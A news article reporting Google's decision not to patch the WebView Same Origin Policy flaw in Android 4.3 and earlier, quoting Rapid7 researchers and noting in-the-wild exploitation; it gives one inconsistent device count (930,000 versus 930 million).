900+ million users left in a lurch as Google says it has stopped providing security patches for the Webview component in Android 4.3 Jellybean and earlier versions
Sad but true. If you one of those people who use Android 4.3 and below version operating system on your smartphone and are waiting for Google to patch the Android Same Origin Policy (SOP) vulnerability, well you are not going to get it from Google.
The Android legacy SOP flaw which was discovered by Rafay Baloch, a Pakistani security researcher, affects the webview component of the Android default browser shipped with around 930,000 smartphones operating on Android 4.3 Jelly Bean and below.
The vulnerability in the WebView component, occurs when replacing the โdataโ attribute of a given HTML object with a JavaScript URL scheme. ย A potential hacker could leverage the UXSS flaw to scrape cookie data and page contents from a vulnerable browser window.
The security hole can be exploited in all versions of the Android Open Source Platform (AOSP) browser which also known as Android stock or default browser. The vulnerability exists only in Android OS 4.3 Jellybean and below.
Rapid7’sย Joe Vennix and Rafay collaborated to put a Metasploit code for this vulnerability so that Google and other smartphone manufacturers could patch the flaw.
However no patch not forthcoming. ย In between, ย Trend Micro Labs discovered that the Metasploit code was being exploited in the wild to hijack Facebook accounts of users who had smartphones running on Android 4.3 Jellybean and below versions.
Now Rapid7 reached out to Google to patch this critical vulnerability and they received a shocking reply from Google. Google has stopped providing security patches for Android 4.3 jelly bean and below versions. This was the reply a security researcher from Metasploit received from Google.
“If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves, but welcome patches with the report for consideration. Other than notifying OEMs, we will not be able to take action on any report that is affecting versions before 4.4 that are not accompanied with a patch.”
The surprised security researcher,ย Tod Beardsley from Rapid7 Metasploit community reported on the blogpost.
“So, Google is no longer going to be providing patches for 4.3. This is some eyebrow-raising news.” he added,ย “I’ve never seen a vulnerability response program that was gated on the reporter providing his own patch, yet that seems to be Google’s position. This change in security policy seemed so bizarre, in fact, that I couldn’t believe that it was actually official Google policy.”
To confirm his shock, Tod followed it up with the Google security himself and got the similar reply from Google security team.
If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves but do notify partners of the issue[…] If patches are provided with the report or put into AOSP we are happy to provide them to partners as well.
It seems that Google has stopped providing support only for the Webview component of old Android versions because when Tod enquired further he was told that, “the Android security team did confirm that other pre-KitKat components, such as the multi-media players, will continue to receive back-ported patches.”
The problem is thatย as of now only the Webview component ofย earlier Android versions is found to be vulnerable, and as proved by Trend Micro Labs, is being exploited in the wild. ย This is the component that should be patched in all versions as soon as possible so that Android smartphone users are not exploited due to the SOP vulnerability.
This also means that a possible 930 million smartphones out there are waiting to be exploited by potential hackers and cybercriminals. According to Google’s latest Android distribution figures, 46 percent of Android devices run Jelly Bean, followed by KitKat at 39.1 percent. The remaining Android users are on Gingerbread (versions 2.3.3-2.3.7, used by 7.8 percent of handsets), Ice Cream Sandwich (versions 4.0.3 to 4.0.4, used by 6.7 percent), and old Froyo (version 2.2, 0.4 percent).
Tod Beardsley stated that this as the most “bizarre” decision by Google.
The smartphone manufacturers who have marketed these smartphones in yester years are no longer interested in providing patches/support to these build. ย So who will provide patches for this critical vulnerability and safeguard millions of Android smartphone users who have Android 4.3 and below, aboard their phones, is anybody’s guess.